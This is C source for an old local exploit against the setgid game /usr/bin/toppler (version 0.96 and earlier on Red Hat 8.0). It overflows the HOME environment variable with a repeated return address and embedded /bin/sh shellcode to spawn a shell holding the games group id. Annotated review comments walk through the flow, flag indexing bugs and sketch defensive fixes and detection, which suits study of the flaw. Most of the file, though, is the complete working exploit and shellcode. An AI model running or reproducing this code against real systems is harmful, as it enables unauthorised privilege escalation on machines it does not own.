Local exploit for /usr/bin/toppler that yields the gid of the games group. Tested against RedHat 8.0.
c92cab560b62bccb2088bbd7e1ee2b423795fe4783101d37181185d7c3dbad96
/*
* /usr/bin/toppler local exploit
* vul <= toppler 0.96
* bug: http://www.securityfocus.com/bid/8132
*
* coded by nic
* Ps: i have see another ex,but it have many nops. ^^:)
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/errno.h>
/* Tag string spliced into the banner literals in main() and usage() by
 * adjacent-string-literal concatenation. */
#define me "tiger"
static char shellcode[] =
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x2e"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x31\xd2"
"\xb0\x0b"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x01"
"\xcd\x80";
/* One row of the target table that main() indexes with the -t argument. */
struct target {
int index; /* number printed in the "-t 0" listing */
char *distro; /* distribution label printed in the listing */
char *dest; /* path passed to execl(); NULL marks the end of the table */
char *name; /* argv[0] given to the executed program */
u_long retaddr; /* address value replicated through the HOME buffer */
int LEN; /* number of bytes of buffer[] that main() fills with retaddr */
};
/*
 * Target table: one real entry (Red Hat 8.0, /usr/bin/toppler) followed by an
 * all-zero terminator row. LEN (256) equals the size of buffer[] in main().
 *
 * NOTE(review): retaddr is a fixed, hard-coded address (presumably a location
 * on the 32-bit process stack - not verifiable from this file). A constant
 * like this only holds where the target's memory layout is identical from run
 * to run; address-space randomisation and a non-executable stack are the
 * controls that invalidate it.
 */
struct target exploit[] = {
{ 1, "redhat 8.0 -", "/usr/bin/toppler",
"toppler", 0xbffff9f8, 256 },
{ 0, NULL, NULL, NULL, 0, 0 }
};
/* Prints the banner and option summary; defined after main(). */
void usage(char *cmd);
/*
 * Entry point: pick a row of exploit[] with -t, build an oversized HOME value
 * from that row, and exec the row's binary with HOME set.
 *
 * Flow as written:
 *   1. With no arguments, print usage and exit.
 *   2. Parse -h / -t <num>; "-t 0" prints the target table and exits.
 *   3. Fill buffer[] with the row's retaddr every 4 bytes, copy shellcode[]
 *      into it starting at offset 1, and export the result as HOME.
 *   4. execl() the row's dest path; if that fails, print a message and
 *      exit(-1).
 *
 * NOTE(review): `type` is assigned only in the -t branch, so an invocation
 * that carries arguments but no -t reaches exploit[type-1] with an
 * indeterminate value.
 * NOTE(review): the -t check admits 1..3, but exploit[] holds one real row
 * plus the terminator, so 2 selects the all-NULL terminator and 3 indexes
 * past the array.
 *
 * Defender's view: per the banner text, the target is attacked through an
 * overflow on the HOME environment variable; presumably it copies
 * getenv("HOME") into a fixed-size buffer without a length check (the
 * target's source is not part of this file). The matching fixes are a bounded
 * copy in the target and removing the setgid bit where the game does not need
 * it. A useful detection is a setuid/setgid program started with a HOME value
 * that is not a plausible path: non-printable bytes or a repeating 4-byte
 * pattern.
 */
int main(int argc, char **argv)
{
int i;
int type;
int size;
int options;
long retaddr;
char buffer[256];
if(argc == 1) {
usage(argv[0]);
exit(0);
}
/* Command-line options: -h for help, -t <num> to select a table row. */
while((options = getopt(argc, argv, "ht:")) != EOF) {
switch(options) {
case 'h':
usage(argv[0]);
exit(0);
case 't':
type = atoi(optarg);
/* NOTE(review): the upper bound of 3 is larger than the one-row table. */
if (type > 3 || type < 0) {
printf("Out of range!!\n");
exit(0);
}
/* 0 is the "list targets" request, not a row number. */
if (type == 0) {
usage(argv[0]);
printf("num . description\n"
"----+----------------------------------------\n");
for (i = 0; exploit[i].dest; i++)
fprintf(stderr, "[%d] | %s %s\n", exploit[i].index, exploit[i].distro, exploit[i].dest);
exit(1);
}
break;
default:
usage(argv[0]);
exit(0);
}
}
/* Rows are numbered from 1 on the command line, hence type-1. */
size = exploit[type-1].LEN;
retaddr = exploit[type-1].retaddr;
fprintf(stderr, "\n--- nic-fuckex "me" - Tower Toppler HOME env buf overflow ex---\n"
"[+] by: nic\n"
"[+] nic-2003 - http://www.0x333.org/\n"
"[+] attacking: %s\n"
"[+] using ret: 0x%8lx\n"
"[+] spawning shell\n", exploit[type-1].dest, retaddr);
/* Replicate the address through the first `size` bytes, stepping 4 bytes. */
for (i = 0; i < size; i += 4)
*(long *)&buffer[i] = retaddr;
/* Overlay the payload at offset 1; strlen() measures shellcode[] up to its
 * terminating NUL. */
memcpy(buffer + 1, shellcode, strlen(shellcode));
setenv("HOME", buffer, 1); /* export the crafted value as HOME, replacing any existing one */
/* Run the target with the modified environment; execl() returns only on
 * failure. */
if ( (execl(exploit[type-1].dest, exploit[type-1].name, NULL)) == -1) {
fprintf(stderr, "Try another target, you scriptkid!\n\n");
exit(-1);
}
return(0);
}
/*
 * Print the tool banner and the command-line synopsis to stderr.
 *
 * cmd is the program name substituted into the "usage:" line.
 */
void usage(char *cmd)
{
    /* Fixed banner text; the `me` tag is joined in by literal concatenation. */
    fputs("\n--- nic-fuckex "me" - Tower Toppler HOME env buff overflow ex--\n"
          "by nic \n"
          "nic-2003 - http://www.0x333.org/\n\n", stderr);

    /* The synopsis line is the only part that depends on the argument. */
    fprintf(stderr, "usage: %s [-h] [-t <num>]\n", cmd);

    /* Option summary, again fixed text. */
    fputs("__options\n"
          " -h\t- this help\n"
          " -t num\t- choose target (0 for list)\n\n", stderr);
}